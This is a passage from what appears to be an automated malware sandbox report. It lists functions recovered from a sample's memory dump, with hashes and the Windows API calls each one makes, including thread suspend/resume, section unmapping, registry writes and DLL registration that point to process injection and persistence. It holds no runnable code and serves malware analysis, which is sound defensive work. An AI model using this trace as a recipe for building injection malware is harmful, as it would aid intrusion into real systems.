    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
